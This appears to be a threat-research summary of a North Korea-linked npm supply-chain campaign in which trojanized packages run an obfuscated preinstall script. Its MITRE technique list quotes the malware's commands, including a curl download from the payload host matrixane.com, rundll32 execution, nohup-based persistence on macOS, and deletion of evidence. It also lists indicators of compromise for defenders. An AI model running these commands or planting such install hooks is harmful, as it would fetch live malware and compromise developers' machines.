Threat Research

Nation-State Threat Actors Renew Publications to npm

Securonix

Phylum reports a renewed North Korean operation leveraging npm to publish trojanized packages that execute code during installation. The latest variant widens targets beyond Windows to macOS and Linux using obfuscated scripts and a download-and-execute payload while trying to hide tracks. Hashtags: #NorthKoreanStateActors #matrixane #node_config #npm #deferenceJS

Keypoints

  • North Korea-linked actors renewed activity in Open Source ecosystems by publishing trojanized npm packages with a preinstall hook.
  • The campaign reuses obfuscated JavaScript (deference.js) to execute payloads on installation.
  • Payload delivery involves downloading malware from a remote server (matrixane.com) via curl and executing it (e.g., rundll32 on Windows).
  • Attacks attempt to cover tracks by renaming legitimate files (pk.json to package.json) and deleting malicious script files (deference.js).
  • OS targeting expands beyond Windows to macOS and Linux, with cross-OS deployment using macOS-specific UpdateProvider folders and nohup-based execution.
  • The campaign demonstrates ongoing North Korean state-sponsored activity in open-source repositories with repeated technique reuse.

MITRE Techniques

  • [T1195] Software Supply Chain – The attackers published trojanized npm packages with a preinstall hook to gain execution upon installation. “The npm user nebourhood open-source published two packages react-dom-production-script and hardhat-daemon with a preinstall hook in the package.json immediately executing a file in the package.”
  • [T1027] Obfuscated/Compressed Files and Information – They used an obfuscated JavaScript file called deference.js; “they resorted to simply executing a single obfuscated JavaScript file called deference.js.”
  • [T1105] Ingress Tool Transfer – The malware downloads a payload from a remote server: “curl –insecure -o data.tmp -L “https://matrixane.com/download/download.asp?id=8931″”
  • [T1218.011] Rundll32 – Windows proxy execution – The Windows payload uses Rundll32 to execute code: “rundll32 data.tmp,GenerateKey 7846”
  • [T1036] Masquerading – The attackers attempted to cover tracks by replacing a legitimate file with a similarly named one: “the replacement of the malicious package.json with pk.json to cover their tracks”
  • [T1070.004] File Deletion – The malware deletes evidence after installation: “exec(‘del deference.js’)”
  • [T1082] System Information Discovery – The script detects OS type to decide deployment: “const type = os.type();” and “if (‘Windows_NT’ === type) {“
  • [T1059.004] Unix Shell – Cross-OS execution on macOS/Linux using shell commands: “mkdir ~/Library/Application Support/UpdateProvider”, “cp ./test-config.ts ~/Library/Application Support/UpdateProvider/updateMacOs”, “nohup … updateMacOs &> /dev/null 2>&1 &”, “rm deference.js”

Indicators of Compromise

  • [Domain] matrixane.com – Domain used to host the payload delivery and malware components.
  • [URL] https://matrixane.com/download/download.asp?id=8931 – Direct download URL for the malicious payload.
  • [File name] deference.js – Obfuscated loader script executed during installation.
  • [File name] data.tmp – Temporary file used to store downloaded payload before execution.
  • [File name] data.bat – Windows payload drop file created during execution on Windows.
  • [File name] updateMacOs – macOS payload allegedly copied and executed in macOS branch.
  • [File name] pk.json, package.json – File renaming to disguise malicious components.

Read more: https://blog.phylum.io/north-korean-state-actors/